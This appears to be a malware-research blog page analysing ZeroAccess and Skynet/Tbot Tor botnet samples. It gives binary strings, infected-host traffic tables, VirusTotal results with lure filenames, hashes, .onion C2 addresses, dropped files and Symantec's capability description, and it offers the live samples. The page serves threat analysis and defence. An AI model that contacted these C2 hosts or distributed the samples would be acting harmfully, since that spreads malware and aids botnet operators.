.t'TR O6qa |-De mTB` \BL\* m`Wo mB"XpH 2C|d X\,j /"JE VW>b gP,.- %m|SXG aOBY A`3"kr9 D dRIT PgBeb ~pi2C USER32.dll CreateWindowExW InvalidateRgn PostMessageW UpdateWindow SetTimer IsIconic GetSystemMetrics GetClientRect DrawIcon EnableWindow PostQuitMessage SetWindowPos MapDialogRect KERNEL32.dll GetVersionExW SetUnhandledExceptionFilter QueryPerformanceCounter GetSystemTimeAsFileTime GetModuleHandleW FreeEnvironmentStringsA GetEnvironmentStrings FreeEnvironmentStringsW GetEnvironmentStringsW GetCommandLineA SetHandleCount GetStdHandle GetFileType GetStartupInfoA HeapDestroy HeapCreate VirtualFree GetModuleFileNameA TerminateProcess UnhandledExceptionFilter GetACP GetOEMCP GetCPInfo IsValidCodePage HeapReAlloc GetTimeZoneInformation DebugBreak OutputDebugStringA WriteConsoleW OutputDebugStringW LCMapStringA LCMapStringW GetStringTypeA OLEAUT32.dll OleLoadPicture DispGetIDsOfNames SafeArrayAllocDescriptor GetErrorInfo SetErrorInfo VariantClear OleLoadPictureEx ADVAPI32 RegQueryInfoKeyA RegSetValueExA RegOpenKeyExA RegCreateKeyExA RegCloseKey RegDeleteValueA RegDeleteKeyA RegEnumKeyExA SHLWAPI.dll PathFindExtensionA WIS_EX O3b3~3 3;4$6 ;9=~=)? 4>5L7 =6>S?s? 
Unicode Strings:
---------------------------------------------------------------------------
\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D79}
\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D77}
\BaseNamedObjects\Restricted\{A3D35150-6823-4462-8C6E-7417FF841D78}
%sU\%08x.@
S-1-5-18
\??\%sU
\??\%s@
\BaseNamedObjects\Restricted\{0C5AB9CD-2F90-6754-8374-21D4DAB28CC1}
shell32.dll
wbem\fastprox.dll
\systemroot
RECYCLER\
$Recycle.Bin\
\$%08x%04x%04x%02x%02x%02x%02x%02x%02x%02x%02x\
c:\windows\system32\z
????????.@
%08x.@
%08x.$
%08x.~
Microsoft Base Cryptographic Provider v1.0

Traffic
Columns: A <-> B | <- Frames Bytes | -> Frames Bytes | Total Frames Bytes
172.16.253.130 <-> 81.17.26.187 | 50 46654 | 31 3711 | 81 50365
172.16.253.130 <-> 67.81.86.2 | 41 38700 | 30 1696 | 71 40396
172.16.253.255 <-> 172.16.253.1 | 57 10592 | 0 0 | 57 10592
172.16.253.130 <-> 50.22.196.70 | 8 1880 | 10 696 | 18 2576
194.165.17.3 <-> 172.16.253.130 | 10 620 | 0 0 | 10 620
172.16.253.130 <-> 66.85.130.234 | 0 0 | 9 558 | 9 558
172.16.253.130 <-> 8.8.8.8 | 4 463 | 4 296 | 8 759
224.0.0.22 <-> 172.16.253.130 | 7 378 | 0 0 | 7 378
217.16.132.181 <-> 172.16.253.130 | 3 174 | 3 1830 | 6 2004
172.16.253.130 <-> 24.177.187.254 | 2 1220 | 2 116 | 4 1336
172.16.253.130 <-> 90.230.66.250 | 2 1220 | 2 116 | 4 1336
172.16.253.130 <-> 68.3.172.252 | 2 1220 | 2 116 | 4 1336
172.16.253.130 <-> 68.39.227.12 | 2 1220 | 2 116 | 4 1336
172.16.253.130 <-> 98.192.218.116 | 2 1220 | 2 116 | 4 1336
172.16.253.130 <-> 85.137.174.6 | 2 1220 | 2 116 | 4 1336
201.211.32.247 <-> 172.16.253.130 | 2 116 | 2 1220 | 4 1336
211.7.72.252 <-> 172.16.253.130 | 1 58 | 3 1830 | 4 1888
172.16.253.130 <-> 71.205.240.248 | 2 1220 | 2 116 | 4 1336
222.147.143.23 <-> 172.16.253.130 | 2 116 | 2 1220 | 4 1336
172.16.253.130 <-> 66.31.49.90 | 2 1220 | 2 116 | 4 1336
180.253.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
184.253.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
190.253.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
201.253.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
212.253.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
213.253.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
172.16.253.130 <-> 71.254.253.254 | 0 0 | 4 232 | 4 232
172.16.253.130 <-> 87.254.253.254 | 0 0 | 4 232 | 4 232
172.16.253.130 <-> 88.254.253.254 | 0 0 | 4 232 | 4 232
172.16.253.130 <-> 115.254.253.254 | 0 0 | 4 232 | 4 232
172.16.253.130 <-> 135.254.253.254 | 0 0 | 4 232 | 4 232
180.254.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
190.254.253.254 <-> 172.16.253.130 | 4 232 | 0 0 | 4 232
172.16.253.130 <-> 122.108.42.3 | 2 1220 | 1 58 | 3 1278
172.16.253.130 <-> 77.38.241.250 | 2 1220 | 1 58 | 3 1278
172.16.253.130 <-> 24.192.219.246 | 0 0 | 3 174 | 3 174
187.24.70.8 <-> 172.16.253.130 | 1 58 | 2 660 | 3 718
172.16.253.130 <-> 24.62.58.244 | 1 610 | 2 116 | 3 726
239.255.255.250 <-> 172.16.253.130 | 3 525 | 0 0 | 3 525
173.217.207.244 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
187.37.221.247 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 77.239.75.251 | 1 190 | 1 58 | 2 248
174.6.201.58 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 96.37.24.59 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 74.134.198.91 | 1 610 | 1 58 | 2 668
217.122.27.18 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 67.249.162.249 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 149.169.251.240 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 79.119.48.248 | 1 610 | 1 58 | 2 668
213.238.99.54 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
190.18.75.10 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
174.5.212.39 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 72.185.161.253 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 76.10.148.252 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 121.88.136.25 | 1 610 | 1 58 | 2 668
190.188.23.234 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
181.46.99.30 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 24.251.155.31 | 1 610 | 1 58 | 2 668
216.212.30.6 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 68.227.164.2 | 1 610 | 1 58 | 2 668
221.31.86.14 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 50.89.229.3 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 24.8.220.1 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 76.85.130.1 | 1 610 | 1 58 | 2 668
201.242.155.52 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 68.97.69.21 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 78.210.148.146 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 132.239.127.98 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 74.197.22.12 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 71.86.90.31 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 82.130.176.36 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 71.75.94.251 | 1 610 | 1 58 | 2 668
184.63.10.2 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 68.198.104.16 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 68.63.59.19 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 72.208.52.19 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 74.88.223.17 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 74.78.96.3 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 62.83.76.8 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 24.189.56.15 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 72.9.76.230 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 37.61.145.4 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 114.42.77.245 | 1 610 | 1 58 | 2 668
186.95.53.23 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 98.244.14.31 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 50.138.151.250 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 83.166.29.245 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 97.82.141.252 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 74.210.227.231 | 1 610 | 1 58 | 2 668
190.183.66.239 <-> 172.16.253.130 | 2 116 | 0 0 | 2 116
172.16.253.130 <-> 83.155.101.250 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 67.171.167.239 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 98.226.151.245 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 78.136.84.249 | 1 610 | 1 58 | 2 668
187.11.74.251 <-> 172.16.253.130 | 1 58 | 1 330 | 2 388
172.16.253.130 <-> 98.15.165.19 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 83.250.104.244 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 66.25.254.251 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 75.108.175.6 | 1 610 | 1 58 | 2 668
200.83.116.254 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 67.86.22.250 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 85.219.65.249 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 93.129.51.17 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 50.82.72.7 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 84.22.46.10 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 68.3.136.248 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 42.2.8.26 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 74.50.161.16 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 92.36.232.253 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 67.242.141.7 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 68.97.192.245 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 76.179.132.243 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 109.91.69.10 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 72.228.143.4 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 24.122.95.248 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 71.230.164.254 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 88.156.158.252 | 1 610 | 1 58 | 2 668
184.155.119.6 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 92.245.80.12 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 75.74.147.252 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 75.178.72.213 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 24.50.88.235 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 68.200.221.136 | 1 610 | 1 58 | 2 668
201.82.178.48 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
201.213.33.102 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 68.230.14.194 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 66.75.24.66 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 50.149.21.3 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 69.244.161.47 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 68.50.37.55 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 75.109.4.31 | 1 610 | 1 58 | 2 668
217.29.105.122 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 71.142.137.30 | 1 610 | 1 58 | 2 668
189.47.43.134 <-> 172.16.253.130 | 1 58 | 1 610 | 2 668
172.16.253.130 <-> 96.54.179.14 | 1 610 | 1 58 | 2 668
172.16.253.130 <-> 65.55.21.20 | 1 90 | 1 90 | 2 180
172.16.253.254 <-> 172.16.253.130 | 0 0 | 2 684 | 2 684
255.255.255.255 <-> 0.0.0.0 | 2 697 | 0 0 | 2 697
209.33.87.124 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 66.67.35.253 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 66.103.121.14 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 76.209.55.86 | 0 0 | 1 58 | 1 58
181.164.33.60 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 75.72.214.254 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 95.234.193.232 | 0 0 | 1 58 | 1 58
209.188.69.239 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 114.42.103.2 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 69.113.243.26 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 46.42.233.237 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 170.51.113.2 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 65.181.33.2 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 31.147.118.11 | 0 0 | 1 58 | 1 58
189.100.56.246 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 80.198.94.247 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 41.200.172.238 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 42.72.147.237 | 0 0 | 1 58 | 1 58
184.41.210.243 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 108.35.221.6 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 96.20.100.20 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 93.114.195.25 | 0 0 | 1 58 | 1 58
189.68.39.1 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 92.86.70.249 | 0 0 | 1 58 | 1 58
190.108.27.11 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
184.6.88.20 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
205.204.22.110 <-> 172.16.253.130 | 1 58 | 0 0 | 1 58
172.16.253.130 <-> 24.247.237.237 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 76.20.50.19 | 0 0 | 1 58 | 1 58
172.16.253.130 <-> 91.242.217.247 | 0 0 | 1 62 | 1 62
172.16.253.130 <-> 4.2.2.2 | 0 0 | 1 76 | 1 76
=========================================================

Automatic scans

https://www.virustotal.com/file/984fb2e07de82bc4a228c715dd0790e45dc1d104f6a9b082da9a4cecc0e151b7/analysis/
SHA256: 984fb2e07de82bc4a228c715dd0790e45dc1d104f6a9b082da9a4cecc0e151b7
SHA1: 5842f0d4fe3f177f2bb06a2e5878da55f7d814c7
MD5: 251a2c7eff890c58a9d9eda5b1391082
File size: 160.5 KB ( 164352 bytes )
File name: vti-rescan
File type: Win32 EXE
Tags: peexe
Detection ratio: 14 / 46
Analysis date: 2012-12-26 05:35:35 UTC ( 1 hour, 12 minutes ago )
AntiVir | TR/Kazy.131060 | 20121225
Avast | Win32:ZAccess-NF [Trj] | 20121226
BitDefender | Trojan.Generic.KDZ.2714 | 20121226
DrWeb | Trojan.DownLoader7.45342 | 20121226
ESET-NOD32 | a variant of Win32/Kryptik.AREI | 20121225
F-Secure | Trojan.Generic.KDZ.2714 | 20121225
Fortinet | W32/Kryptik.ARCN!tr | 20121226
GData | Trojan.Generic.KDZ.2714 | 20121226
Kaspersky | Backdoor.Win32.ZAccess.apvo | 20121226
Kingsoft | Win32.Hack.ZAccess.ap.(kcloud) | 20121225
Malwarebytes | Rootkit.0Access | 20121226
Microsoft | Trojan:Win32/Sirefef.P | 20121226
TrendMicro-HouseCall | TROJ_GEN.R47H1LP | 20121225
ViRobot | Backdoor.Win32.A.ZAccess.164352.E | 20121226

https://www.virustotal.com/file/d9dfcc507d773bf76075eed8abbb61e54f03f5f920b5c348fd7a0bf5f7bab3dd/analysis/
SHA256: d9dfcc507d773bf76075eed8abbb61e54f03f5f920b5c348fd7a0bf5f7bab3dd
SHA1: 56104a626101126eed10e65171a26e25b6e50712
MD5: 1a12137bd701bd9ed607671ce1b7806a
File size: 160.5 KB ( 164352 bytes )
File name: amateur_dog_sex_01.avi.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 6 / 46
Analysis date: 2012-12-25 10:50:38 UTC ( 19 hours, 59 minutes ago )
BitDefender | Gen:Variant.Kazy.131060 | 20121225
F-Secure | Gen:Variant.Kazy.131060 | 20121225
Kaspersky | Backdoor.Win32.ZAccess.apvo | 20121225
Malwarebytes | Rootkit.0Access | 20121225
TrendMicro-HouseCall | TROJ_GEN.F47V1225 | 20121225

https://www.virustotal.com/file/13586ffeca632e34c5813dcce4729b20852db0c9fb3ae0b6319699c739f5be29/analysis/
SHA256: 13586ffeca632e34c5813dcce4729b20852db0c9fb3ae0b6319699c739f5be29
SHA1: 865cf7a7ff3dde0828e7764751d76c8df6291506
MD5: 59b247f0266b107451104243261a7ecf
File size: 159.5 KB ( 163328 bytes )
File name: animal-xxx-movie.avi.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 13 / 46
Analysis date: 2012-12-25 19:00:57 UTC ( 11 hours, 50 minutes ago )
AhnLab-V3 | Backdoor/Win32.ZAccess | 20121225
Avast | Win32:ZAccess-NF [Trj] | 20121226
BitDefender | Trojan.Generic.KD.817138 | 20121225
DrWeb | Trojan.DownLoader7.45437 | 20121226
ESET-NOD32 | a variant of Win32/Kryptik.AREI | 20121225
F-Secure | Trojan.Generic.KD.817138 | 20121225
Fortinet | W32/Kryptik.ARCN!tr | 20121225
GData | Trojan.Generic.KD.817138 | 20121225
Kaspersky | Backdoor.Win32.ZAccess.apzt | 20121225
Malwarebytes | Rootkit.0Access | 20121225
McAfee-GW-Edition | - | 20121225
Microsoft | Trojan:Win32/Meredrop | 20121226
MicroWorld-eScan | Trojan.Generic.KD.817138 | 20121225
TrendMicro-HouseCall | TROJ_GEN.F47V1225 | 20121225

https://www.virustotal.com/file/ac263c2267892fc9995ad841fc649e2071f8626dcc0d2d27cbce4ab6cb54f4ca/analysis/
SHA256: ac263c2267892fc9995ad841fc649e2071f8626dcc0d2d27cbce4ab6cb54f4ca
SHA1: 33395e02036526ef7c3ab05afb137c7af2bcd6df
MD5: 98a993d62d367682048ec70df109e7d8
File size: 161.0 KB ( 164864 bytes )
File name: vti-rescan
File type: Win32 EXE
Tags: peexe
Detection ratio: 20 / 46
Analysis date: 2012-12-26 05:39:43 UTC ( 1 hour, 12 minutes ago )
AhnLab-V3 | Backdoor/Win32.ZAccess | 20121225
AntiVir | TR/Rogue.kdz.2666.1 | 20121225
Avast | Win32:ZAccess-NE [Trj] | 20121226
AVG | BackDoor.Generic16.ZLB | 20121225
BitDefender | Trojan.Generic.KDZ.2666 | 20121226
Comodo | UnclassifiedMalware | 20121226
DrWeb | Trojan.DownLoader7.45110 | 20121226
ESET-NOD32 | a variant of Win32/Kryptik.AREI | 20121225
F-Secure | Trojan.Generic.KDZ.2666 | 20121225
Fortinet | W32/ZAccess.APQP!tr.bdr | 20121226
GData | Trojan.Generic.KDZ.2666 | 20121226
Kaspersky | Backdoor.Win32.ZAccess.apqp | 20121226
Kingsoft | Win32.Malware.Generic.a.(kcloud) | 20121225
Malwarebytes | Rootkit.0Access | 20121226
McAfee-GW-Edition | - | 20121226
Microsoft | Trojan:Win32/Sirefef.P | 20121226
nProtect | Trojan.Generic.KDZ.2666 | 20121225
Panda | Suspicious file | 20121225
TrendMicro-HouseCall | TROJ_GEN.R47H1LP | 20121225
VIPRE | Trojan.Win32.Generic!BT | 20121226
ViRobot | Backdoor.Win32.A.ZAccess.164864.L | 20121226

https://www.virustotal.com/file/71b38f041b4a4ae169c44e3aff412e527e1156f92c27f1340a8abe70a45bee10/analysis/
SHA256: 71b38f041b4a4ae169c44e3aff412e527e1156f92c27f1340a8abe70a45bee10
SHA1: 6d21fc25b9da49d746b2b7609a5efaed4d332e6a
MD5: a2611095f689fadffd3068e0d4e3e7ed
File size: 160.0 KB ( 163840 bytes )
File name: amateur_dog_sex_01.avi.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 14 / 45
Analysis date: 2012-12-26 00:19:54 UTC ( 6 hours, 35 minutes ago )
Avast | Win32:ZAccess-NF [Trj] | 20121226
BitDefender | Trojan.Generic.KD.817217 | 20121226
Comodo | TrojWare.Win32.Trojan.Agent.Gen | 20121226
DrWeb | Trojan.DownLoader7.45527 | 20121226
Emsisoft | Backdoor.Win32.ZAccess (A) | 20121226
Fortinet | W32/Kryptik.ARCN!tr | 20121226
GData | Trojan.Generic.KD.817217 | 20121226
Ikarus | Backdoor.Win32.ZAccess | 20121226
Kaspersky | Backdoor.Win32.ZAccess.aqep | 20121226
Kingsoft | Win32.Malware.Generic.a.(kcloud) | 20121225
Malwarebytes | Rootkit.0Access | 20121226
McAfee-GW-Edition | - | 20121226
MicroWorld-eScan | Trojan.Generic.KD.817217 | 20121226
SUPERAntiSpyware | - | 20121224
Symantec | WS.Reputation.1 | 20121226
TrendMicro-HouseCall | TROJ_GEN.RFFH1LQ | 20121226

DEC. 2012 SKYNET TOR BOTNET / TROJAN.TBOT SAMPLES
December 26, 2012, 10:39 pm

Here are 7 binaries for the Skynet Tor botnet aka Trojan.Tbot. Claudio's analysis is wonderfully detailed; I just added pcaps and a few words in the description. Read more here: Rapid7. Claudio Guarnieri. Skynet, a Tor-powered botnet straight from Reddit

Files
2E1814CCCF0C3BB2CC32E0A0671C0891 | 17.1 MB | Coldplay-Live_2012-2012-BriBerY.exe_
5375fb5e867680ffb8e72d29db9abbd5 | 15 MB | FileMaker_Server_Advanced_v12.0.1_MULTiLANGUAGE-CYGiSO.exe_
A0552D1BC1A4897141CFA56F75C04857 | 10 MB | SpeedCommander.v14.40.Incl.Keygen-MESMERiZE.exe_
191B26BAFDF58397088C88A1B3BAC5A6 | 14.9 MB | tor.exe_
519ED597B22D46EF8029C0720206E9D5 | 14.8 MB | UEStudio.v12.20.0.1002.Incl.Keygen-MESMERiZE.exe_
23AAB9C1C462F3FDFDDD98181E963230 | 14.9 MB | ysahu.ex_
fc7c3e087789824f34a9309da2388ce5 | 11.3 MB | Z.wie.Zorro.S01E03.Der.Brandstifter.GERMAN.ANiME.FS.DVDRip.XViD-aWake.exe_

The files are very large but contain no video or other entertainment material; they are just padded with zeros.

Download
Download all 7 files above
Email me if you need the password
Download all the created / dropped files for 2E1814CCCF0C3BB2CC32E0A0671C0891

Available pcaps -- Download (no password)
4.08 MB | tbot_2E1814CCCF0C3BB2CC32E0A0671C0891.pcap
3.24 MB | tbot_23AAB9C1C462F3FDFDDD98181E963230.pcap
7.55 MB | tbot_191B26BAFDF58397088C88A1B3BAC5A6.pcap
5.19 MB | tbot_5375FB5E867680FFB8E72D29DB9ABBD5.pcap
3.97 MB | tbot_A0552D1BC1A4897141CFA56F75C04857.pcap
7.43 MB | tbot_FC7C3E087789824F34A9309DA2388CE5.pcap

File description

Domains for each sample
191B26BAFDF58397088C88A1B3BAC5A6 | 4kijo4rr4b6p6uv5.onion
23AAB9C1C462F3FDFDDD98181E963230 | jtjoxo3uo3mh35kw.onion
2E1814CCCF0C3BB2CC32E0A0671C0891 | c24dsyw5qwcbohtv.onion
519ED597B22D46EF8029C0720206E9D5 | 465z2el27gv4ls74.onion
5375FB5E867680FFB8E72D29DB9ABBD5 | jnc6zswe3w6siqn2.onion
A0552D1BC1A4897141CFA56F75C04857 | blm6o2rzv4ucdq4m.onion
FC7C3E087789824F34A9309DA2388CE5 | enklhhn44mk2s6rc.onion

Active Connections
Proto | Local Address | Foreign Address | State | PID
TCP | 127.0.0.1:2064 | 127.0.0.1:2065 | ESTABLISHED | 2376 [IEXPLORE.EXE]
TCP | 127.0.0.1:2065 | 127.0.0.1:2064 | ESTABLISHED | 2376 [IEXPLORE.EXE]
TCP | 127.0.0.1:2069 | 127.0.0.1:9050 | ESTABLISHED | 2860 [IEXPLORE.EXE]
TCP | 127.0.0.1:9050 | 127.0.0.1:2069 | ESTABLISHED | 2376 [IEXPLORE.EXE]
TCP | 172.16.253.130:2100 | 204.45.139.123:443 | ESTABLISHED | 2376 [IEXPLORE.EXE]
TCP | 172.16.253.130:2103 | 82.96.35.6:443 | ESTABLISHED | 2376 [IEXPLORE.EXE]
TCP | 172.16.253.130:2104 | 109.105.109.163:44945 | ESTABLISHED | 2376 [IEXPLORE.EXE]
TCP | 127.0.0.1:2147 | 127.0.0.1:42349 | CLOSE_WAIT | 1592 [Explorer.EXE]

File changes
Red - << old, classic, pre-Citadel Zeus
Blue - << tbot
%USERPROFILE%\Application Data\Microsoft\Address Book\Laura.wab
%USERPROFILE%\Application Data\Microsoft\Address Book\Laura.wab~
%USERPROFILE%\Application Data\Kynir\tonob.exe < copy of the original dropper
%USERPROFILE%\Application Data\tor\cached-certs
%USERPROFILE%\Application Data\tor\cached-consensus
%USERPROFILE%\Application Data\tor\cached-descriptors
%USERPROFILE%\Application Data\tor\cached-descriptors.new
%USERPROFILE%\Application Data\tor\hidden_service\hostname
%USERPROFILE%\Application Data\tor\hidden_service\private_key
%USERPROFILE%\Application Data\tor\lock
%USERPROFILE%\Application Data\tor\state
%USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Folders.dbx
%USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Inbox.dbx
%USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Offline.dbx
%USERPROFILE%\Local Settings\Application Data\Identities\{2C885C6E-EF41-44B6-8DF1-67B7CC85A1F4}\Microsoft\Outlook Express\Sent Items.dbx
%USERPROFILE%\Local Settings\Temp\OpenCL.dll
%USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\test[1].txt
%USERPROFILE%\Application Data\Egoffi\poofd.tmp

deleted_files
%USERPROFILE%\Application Data\tor\cached-descriptors
%USERPROFILE%\Application Data\tor\cached-descriptors.new
%USERPROFILE%\Application Data\tor\hidden_service\hostname
%USERPROFILE%\Application Data\tor\state
%USERPROFILE%\Application Data\tor\unverified-consensus
%USERPROFILE%\Cookies\laura@accounts.google[2].txt (plus all other cookies)
%USERPROFILE%\Local Settings\Temp\MPS9.tmp
%USERPROFILE%\Local Settings\Temp\tmp1c031ecd.bat
%USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\17K91ZPH\gate[1].htm
%USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\config[1].bin
%USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\gate[1].htm
%USERPROFILE%\Local Settings\Temporary Internet Files\Content.IE5\1Y7JRJG6\webhp[1].txt

State
# Tor state file last generated on 2012-12-23 21:40:56 local time
# Other times below are in GMT
# You *do not* need to edit this file.
TorVersion Tor 0.2.2.35 (git-b04388f9e7546a9f)
LastWritten 2012-12-24 02:40:56

The description below is from Symantec:

> "When the Trojan is executed, it creates the following files:
>
> C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].exe
> C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].tmp
> C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].upp
> C:\Documents and Settings\Administrator\Application Data\tor\cached-certs
> C:\Documents and Settings\Administrator\Application Data\tor\cached-consensus
> C:\Documents and Settings\Administrator\Application Data\tor\cached-descriptors
> C:\Documents and Settings\Administrator\Application Data\tor\cached-descriptors.new
> C:\Documents and Settings\Administrator\Application Data\tor\hidden_service\hostname
> C:\Documents and Settings\Administrator\Application Data\tor\hidden_service\private_key
> C:\Documents and Settings\Administrator\Application Data\tor\lock
> C:\Documents and Settings\Administrator\Application Data\tor\state
> C:\Documents and Settings\Administrator\Local Settings\Temp\OpenCL.dll
>
> The Trojan then creates the following registry entry:
> HKEY_USERS\S-1-5-21-1172441840-534431857-1906119351-500\Software\Microsoft\Windows\CurrentVersion\Run\{58918AFF-36B7-5CDE-6038-278B35A6192F}: "C:\Documents and Settings\Administrator\Application Data\[RANDOM CHARACTERS FOLDER NAME]\[RANDOM CHARACTERS FILE NAME].exe"
>
> The Trojan copies itself to the following location:
> %UserProfile%\Application Data
>
> The Trojan creates a directory with a random name and renames itself with a random string.
>
> The Trojan injects itself into an svchost.exe process and terminates the original process.
>
> The Trojan connects to an IRC channel and receives commands which may perform the following actions:
>
> Steal information from the compromised computer and send it to the remote attacker
> Download and execute files from a remote location
> Download and inject files into a running process
> Connect to an arbitrary URL
> Set up a SOCKS proxy
> Support denial-of-service attacks
>
> The Trojan drops the following files:
>
> Tor: A network client for the Tor anonymous network that is used to route and hide all the network traffic the threat sends to the IRC C&C server
> Trojan.Zbot: An additional threat installed by Trojan.Tbot
